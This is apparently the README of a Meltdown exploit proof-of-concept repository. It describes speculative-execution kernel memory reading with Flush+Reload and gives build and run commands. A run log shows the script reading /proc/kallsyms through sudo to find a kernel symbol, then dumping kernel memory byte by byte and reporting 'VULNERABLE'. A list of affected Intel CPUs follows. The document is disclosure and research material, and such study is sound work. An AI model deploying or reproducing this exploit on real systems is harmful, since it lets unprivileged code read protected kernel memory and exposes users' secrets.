/meltdown-exploit

Meltdown Exploit PoC

Primary LanguageC

MELTDOWN EXPLOIT POC

Speculative optimizations execute code in a non-secure manner leaving data traces in microarchitecture such as cache.

Refer to the paper by Lipp et. al 2017 for details: https://meltdownattack.com/meltdown.pdf.

Can only dump linux_proc_banner at the moment, since requires accessed memory to be in cache and linux_proc_banner is cached on every read from /proc/version. Might work with prefetch.

Build with make, run with ./run.sh.

Can't defeat KASLR yet, so you may need to enter your password to find linux_proc_banner in the /proc/kallsyms (or do it manually).

Flush+Reload and target array approach taken from spectre paper https://spectreattack.com/spectre.pdf implemented following clues from https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.

Pandora's box is open.

Result:

$ make
cc -O2 -msse2   -c -o meltdown.o meltdown.c
cc   meltdown.o   -o meltdown
$ ./run.sh 
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo awk 
	/linux_proc_banner/ {
		if (strtonum("0x"$1))
			print $1;
		exit 0;
	} /proc/kallsyms
+ linux_proc_banner=ffffffffa3e000a0
+ set +x
cached = 29, uncached = 271, threshold 88
read ffffffffa3e000a0 = 25 %
read ffffffffa3e000a1 = 73 s
read ffffffffa3e000a2 = 20  
read ffffffffa3e000a3 = 76 v
read ffffffffa3e000a4 = 65 e
read ffffffffa3e000a5 = 72 r
read ffffffffa3e000a6 = 73 s
read ffffffffa3e000a7 = 69 i
read ffffffffa3e000a8 = 6f o
read ffffffffa3e000a9 = 6e n
read ffffffffa3e000aa = 20  
read ffffffffa3e000ab = 25 %
read ffffffffa3e000ac = 73 s
read ffffffffa3e000ad = 20  
read ffffffffa3e000ae = 28 (
read ffffffffa3e000af = 62 b
read ffffffffa3e000b0 = 75 u
read ffffffffa3e000b1 = 69 i
read ffffffffa3e000b2 = 6c l
read ffffffffa3e000b3 = 64 d
read ffffffffa3e000b4 = 64 d
read ffffffffa3e000b5 = 40 @
VULNERABLE
VULNERABLE ON
4.10.0-42-generic #46~16.04.1-Ubuntu SMP Mon Dec 4 15:57:59 UTC 2017 x86_64
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 158
model name	: Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz
stepping	: 9
microcode	: 0x5e
cpu MHz		: 3499.316
cache size	: 6144 KB
physical id	: 0

Does not work

If it compiles but fails with Illegal instruction then either your hardware is very old or it is a VM. Try compiling with:

$ make CFLAGS=-DHAVE_RDTSCP=0 clean all

Works on

processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 158
model name	: Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz
stepping	: 9
microcode	: 0x5e
cpu MHz		: 3685.083
cache size	: 6144 KB
physical id	: 0
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 94
model name	: Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz
stepping	: 3
microcode	: 0x7c
cpu MHz		: 3975.078
cache size	: 8192 KB
physical id	: 0
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 42
model name	: Intel(R) Core(TM) i5-2410M CPU @ 2.30GHz
stepping	: 7
microcode	: 0x29
cpu MHz		: 802.697
cache size	: 3072 KB
physical id	: 0
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 79
model name	: Intel(R) Xeon(R) CPU E5-2650 v4 @ 2.20GHz
stepping	: 1
microcode	: 0x1
cpu MHz		: 2199.998
cache size	: 30720 KB
physical id	: 0
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 69
model name	: Intel(R) Core(TM) i3-4010U CPU @ 1.70GHz
stepping	: 1
microcode	: 0x16
cpu MHz		: 800.062
cache size	: 3072 KB
physical id	: 0